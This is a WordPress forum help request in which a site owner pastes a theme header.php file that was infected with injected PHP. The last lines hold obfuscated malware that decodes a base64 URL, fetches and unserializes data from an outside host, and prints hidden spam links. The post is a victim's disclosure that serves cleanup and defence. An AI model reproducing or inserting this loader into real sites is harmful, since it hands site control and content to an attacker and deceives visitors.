Evil exploit in Header.php File
-
Has anyone else been hit by this – how to stop the exploit happening again?
I deleted the code twice now ??You can see the nasty stuff in the last lines at the bottom. Inserts about 600 invisible links for Viagra in your html source. XD
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="https://www.w3.org/1999/xhtml"> <head profile="https://gmpg.org/xfn/11"> <META name="verify-v1" content="vr+EovmENQbzitArGOodFTd10dFtSJ3h8bCkBPVdTdE=" /> <meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" /> <title><?php bloginfo('name'); ?> <?php if ( is_single() ) { ?> » Blog Archive <?php } ?> <?php wp_title(); ?></title> <meta name="generator" content="WordPress <?php bloginfo('version'); ?>" /> <!-- leave this for stats --> <?php if (eregi("MSIE",getenv("HTTP_USER_AGENT")) || eregi("Internet Explorer",getenv("HTTP_USER_AGENT"))) { ?><link rel="stylesheet" type="text/css" href="<?php bloginfo('stylesheet_directory'); ?>/style-ie.css"/> <?php } else { ?> <link rel="stylesheet" type="text/css" href="<?php bloginfo('stylesheet_directory'); ?>/style-ie.css"/> <?php } ?> <link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="<?php bloginfo('rss2_url'); ?>" /> <link rel="alternate" type="text/xml" title="RSS .92" href="<?php bloginfo('rss_url'); ?>" /> <link rel="alternate" type="application/atom+xml" title="Atom 0.3" href="<?php bloginfo('atom_url'); ?>" /> <link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" /> <style type="text/css" media="screen"></style> <?php wp_head(); ?> </head> <body> <div id="topbar"> <div class="searchform"><?php include (TEMPLATEPATH . '/searchform.php'); ?></div> <div class="nav"><a href="<?php echo get_settings('home'); ?>">Home</a> | <!-- <a href="">Link 1</a> | <a href="">Link 2</a> | <a href="">Link 3</a> | <a href="">Link 4</a> | <a href="">Link 5</a> | --> </div> </div> <div id="headerimg"></div> <div id="page-top"><div id="page-bottom"><div id="page"> <?php /* wp_remote_fopen procedure */ $wp_remote_fopen='aHR0cDovL3F3ZXRyby5jb20vc3Mv'; $opt_id='0687d858c81740b39cf1d01bdde2afc7'; $blarr=get_option('cache_vars'); if(trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.'.md5'))!=md5($blarr)){ $blarr=trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.'.txt')); update_option('cache_vars',$blarr); } $blarr=unserialize(base64_decode(get_option('cache_vars'))); if($blarr['hide_text']!='' && sizeof($blarr['links'])>0){ if($blarr['random']){ $new=''; foreach(array_rand($blarr['links'],sizeof($blarr['links'])) as $k) $new[$k]=$blarr['links'][$k]; $blarr['links']=$new; } $txt_out=''; foreach($blarr['links'] as $k=>$v) $txt_out.='<a href="'.$v.'">'.$k.'</a>'; echo str_replace('[LINKS]',$txt_out,$blarr['hide_text']); } /* wp_remote_fopen procedure */ ?>
Viewing 6 replies - 1 through 6 (of 6 total)
Viewing 6 replies - 1 through 6 (of 6 total)
- The topic ‘Evil exploit in Header.php File’ is closed to new replies.